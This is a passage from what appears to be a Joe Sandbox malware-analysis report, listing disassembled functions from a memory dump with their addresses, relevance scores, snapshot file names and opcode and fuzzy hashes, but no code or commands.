                                                                                                  • Instruction Fuzzy Hash: 7321E93091891D9FDB94FB68C8889EDB7F1FF58341F10057AD009D32A5DB35A981CB44
                                                                                                  Function 00007FF848E26618 Relevance: .1, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6ad6ce8ac33e41fd9f069d323eb1c5e4a2d0c16da6b219828f82bec267d45fd
                                                                                                  • Instruction ID: 75b598939c93679da223b10c19b51e8f631cce05b81eced130118204b6c24d7f
                                                                                                  • Opcode Fuzzy Hash: d6ad6ce8ac33e41fd9f069d323eb1c5e4a2d0c16da6b219828f82bec267d45fd
                                                                                                  • Instruction Fuzzy Hash: 5F21567191991C8FEF98DF18C895EA977B1FB64301F1002AAD00EE3660CF75AE858F40
                                                                                                  Function 00007FF848E26523 Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7ad3b48ef590fc901c558057e07195bd87c894972922a27364cee55c95fca0f5
                                                                                                  • Instruction ID: abc4b7a3e6071e914470d451c7f29df157d32cf3ace700c488aa111783bdc02e
                                                                                                  • Opcode Fuzzy Hash: 7ad3b48ef590fc901c558057e07195bd87c894972922a27364cee55c95fca0f5
                                                                                                  • Instruction Fuzzy Hash: E621477191991C8EEF98DF18C895EAAB7B1FB64741F1002AAD00EE3651CF755E858F40
                                                                                                  Function 00007FF848E20C25 Relevance: .1, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bd4f4aa29a806123ef2202097f7864e2b313e03b0d63f86dcc246b719d2984ed
                                                                                                  • Instruction ID: 7b4af5aeb9d7bb81a687d77a734d121995783a8b70aa4eda3290da29e313eeaf
                                                                                                  • Opcode Fuzzy Hash: bd4f4aa29a806123ef2202097f7864e2b313e03b0d63f86dcc246b719d2984ed
                                                                                                  • Instruction Fuzzy Hash: C321E476A0D68E5FE702BB68CC161ED7B70FF82391F0445B2C0459B1E2DB38250AC7A9
                                                                                                  Function 00007FF848E25F32 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 174dd11aedc323fcef21c3fe27d6875b05e89437bbc48c86dc56fa00553489d3
                                                                                                  • Instruction ID: 8c23b80e7db2fb9b6d6a107a35594569319c9734a51ed7d43f2a7f9c5c40d469
                                                                                                  • Opcode Fuzzy Hash: 174dd11aedc323fcef21c3fe27d6875b05e89437bbc48c86dc56fa00553489d3
                                                                                                  • Instruction Fuzzy Hash: 4C2194B0D4852E8FEBA5EF14C944BE9B3B5FB54341F0001F9914DA6291CB786AC58F08
                                                                                                  Function 00007FF848E20C38 Relevance: .1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39c535b8ac22605afe1bb02bb3d2210107a91e69a71b3daa0e93883b1b57cd76
                                                                                                  • Instruction ID: 3344a82e9eea181e2e302ea81c6068dbc0dc4eebc80125548f0a2b6de815a4b8
                                                                                                  • Opcode Fuzzy Hash: 39c535b8ac22605afe1bb02bb3d2210107a91e69a71b3daa0e93883b1b57cd76
                                                                                                  • Instruction Fuzzy Hash: 4111C172A0DA8E5FE702BB68C8162E97B70FF82390F0445B2C045DB1E2DB382509C799
                                                                                                  Function 00007FF848E20C40 Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b0e8b9d206595f926a13ecba58a2d45847283fa2946505566e9956a5c7d0b30b
                                                                                                  • Instruction ID: 8142ea8df9e3a18e073740675087f41991e463f8d371ebff5931f665fbccca3b
                                                                                                  • Opcode Fuzzy Hash: b0e8b9d206595f926a13ecba58a2d45847283fa2946505566e9956a5c7d0b30b
                                                                                                  • Instruction Fuzzy Hash: C711C271A0D68E9FE702BB24C8562E97B70FF82350F0445B6C045DB1E2CB382509CB99
                                                                                                  Function 00007FF848E20C48 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 63ff6fdce7db4b6bc6876f84a41b05f58dd8f93e909d24f417e21d4c433ba4cb
                                                                                                  • Instruction ID: 3bd920458a9c9da5b62ced4ad79c18c37dcfaf89e264256158e9eb1c3f6b72f2
                                                                                                  • Opcode Fuzzy Hash: 63ff6fdce7db4b6bc6876f84a41b05f58dd8f93e909d24f417e21d4c433ba4cb
                                                                                                  • Instruction Fuzzy Hash: 3011C471A0D68E9FE702BB24C8152E97B70FF42350F0445B6D045DB1E2DF382549C799
                                                                                                  Function 00007FF848E20C50 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6ffa781a46399418c2f9151c17dadd5f6797a2c1b157deec01c3d9ad584af1db
                                                                                                  • Instruction ID: a16e6e07078dab48f41f245f9d9dca673ca6bc7c9838c06b1a49d1d5e28bab6f
                                                                                                  • Opcode Fuzzy Hash: 6ffa781a46399418c2f9151c17dadd5f6797a2c1b157deec01c3d9ad584af1db
                                                                                                  • Instruction Fuzzy Hash: ED01CCB0A0D68A9FE702BB24C8152E9BBB0FF42340F0405B2C0459B1E2CF382608C759
                                                                                                  Function 00007FF848E21348 Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8688405778787aa31ef057f64740a7190dbed15580378937fdc359a27c50175d
                                                                                                  • Instruction ID: 7aa2854c4d44fb62646e52de71ef402739665c591b16137ca54c1e75c76b0c07
                                                                                                  • Opcode Fuzzy Hash: 8688405778787aa31ef057f64740a7190dbed15580378937fdc359a27c50175d
                                                                                                  • Instruction Fuzzy Hash: 6EF0A470918A4D9FDF84EF58C448AAA7BE0FF28340F5045A6F819C7261DB30E9A0CB84
                                                                                                  Function 00007FF848E25E83 Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3160e6e0328d2032003b4aec6bfb797262845d8efdde97b805d2eeb8b6af0af9
                                                                                                  • Instruction ID: 71ff2ce4ddafa6a8a300a43d26f82b84d23d7eae96a640f489a367813906d9e5
                                                                                                  • Opcode Fuzzy Hash: 3160e6e0328d2032003b4aec6bfb797262845d8efdde97b805d2eeb8b6af0af9
                                                                                                  • Instruction Fuzzy Hash: 2C01E870D4852B8FEBA9EF00C9447B973B5FB50342F5001FDD049A6292CB786A84CF08
                                                                                                  Function 00007FF848E27F08 Relevance: .0, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bec1f0a460955b41858968c0e445b3ad95268f63a050a1f25ebb8d0e22fd0e5c
                                                                                                  • Instruction ID: f16cbe2ae66fd3b3a82f1e16a72c19d3f43e87be84a57a7a7421e3480916b69c
                                                                                                  • Opcode Fuzzy Hash: bec1f0a460955b41858968c0e445b3ad95268f63a050a1f25ebb8d0e22fd0e5c
                                                                                                  • Instruction Fuzzy Hash: A1F0DA7090D5198EEB64AB54D8447EDB7B0FB89344F1050A8D54EA22C1CA386AC5CF19
                                                                                                  Function 00007FF848E28575 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad9440fbe3fa6cc2806e4cde0abe7efa8b276629f3bb08c8a942b2c526181ac0
                                                                                                  • Instruction ID: cedb06f80de88e43dfa8e3b9ce4589ec97d1bbaefbffca61272a13b51adb056a
                                                                                                  • Opcode Fuzzy Hash: ad9440fbe3fa6cc2806e4cde0abe7efa8b276629f3bb08c8a942b2c526181ac0
                                                                                                  • Instruction Fuzzy Hash: 02F01C30D0956A4BE7A9EA18C8556A977B2FF80741F0441F5E00DA6196DE342E828F84

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FF848E209B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c9$!k9$"s9$#{9
                                                                                                  • API String ID: 0-1692736845
                                                                                                  • Opcode ID: 2484e477cbed5a13cb0a76689aca07807f556d7a7c5e6766e9a855ad754be20e
                                                                                                  • Instruction ID: 84d876153baa107b14e053401172f7f51c7db25012cad63de1946b2133405e58
                                                                                                  • Opcode Fuzzy Hash: 2484e477cbed5a13cb0a76689aca07807f556d7a7c5e6766e9a855ad754be20e
                                                                                                  • Instruction Fuzzy Hash: C8415812B0A9266AF11336BD74021FD6F44FF813B9F484677E04C898DB6F19A18682FD